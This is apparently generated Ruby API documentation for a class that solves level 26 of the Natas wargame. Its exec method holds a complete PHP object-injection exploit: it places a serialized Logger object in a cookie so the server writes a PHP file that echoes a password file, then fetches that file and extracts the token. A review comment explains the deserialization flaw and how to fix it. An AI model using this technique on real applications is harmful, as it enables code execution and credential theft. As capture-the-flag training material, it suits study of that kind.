Class: NatasLevel26

Inherits:
NatasLevelBase
Defined in:
lib/natas.rb

Overview

Level 26

Constant Summary

LEVEL =
26
PAGE =
'/'
PAYLOAD =
%(<? echo(file_get_contents("#{WEBPASS}/natas27")); ?>)
LENGTH =
20
DICT =
('a'..'z').to_a +
('A'..'Z').to_a +
('0'..'9').to_a

Constants inherited from NatasLevelBase

NatasLevelBase::HOST, NatasLevelBase::LOGIN, NatasLevelBase::PASSWORD_LENGTH, NatasLevelBase::PORT, NatasLevelBase::WEBPASS

Instance Attribute Summary

Attributes inherited from NatasLevelBase

#login, #password

Instance Method Summary

Methods inherited from NatasLevelBase

#get, #initialize, #level, #post

Constructor Details

This class inherits a constructor from NatasLevelBase

Instance Method Details

#exec ⇒ Object



# File 'lib/natas.rb', line 732

# Runs the level: sends a PHP-serialized +Logger+ object in the +drawing+
# cookie, then requests the file named in that object and reports the
# 32-character token found in the response.
#
# NOTE(review): the server side is not visible here. Presumably it passes the
# cookie to PHP's unserialize() and the Logger class writes +exitMsg+ to
# +logFile+ when the object is destroyed; confirm against the level source.
# If so, the root cause is deserializing client-controlled data. The usual
# remedies are a data-only format (e.g. JSON) or
# unserialize($value, ['allowed_classes' => false]), and not serving a
# writable directory as executable PHP.
def exec
  # LENGTH random characters drawn (with repetition) from the alphanumeric DICT.
  token = LENGTH.times.each_with_object(String.new) { |_, acc| acc << DICT.sample }
  target = "img/#{token}.php"

  # "\x00Logger\x00name" is how PHP's serialize format spells a private
  # property of class Logger; each s:N prefix is the length of the string that
  # follows. PHP counts bytes there, so String#length is only right while
  # +target+ and PAYLOAD are pure ASCII.
  serialized = %(O:6:"Logger":3:{s:15:"\x00Logger\x00logFile";s:#{target.length}:"#{target}";s:15:"\x00Logger\x00initMsg";s:0:"";s:15:"\x00Logger\x00exitMsg";s:#{PAYLOAD.length}:"#{PAYLOAD}";})
  cookie = "drawing=#{Base64.strict_encode64(serialized)}"

  # First request delivers the cookie; second fetches the resulting file.
  get(PAGE, { 'Cookie' => cookie })
  body = get("/#{target}").body

  # The token is 32 word characters followed by a newline.
  hit = /(\w{32})\n/.match(body)
  # Assumes not_found does not return (raises or exits); otherwise hit[1]
  # below would fail on nil. TODO confirm in NatasLevelBase.
  not_found unless hit
  found(hit[1])
end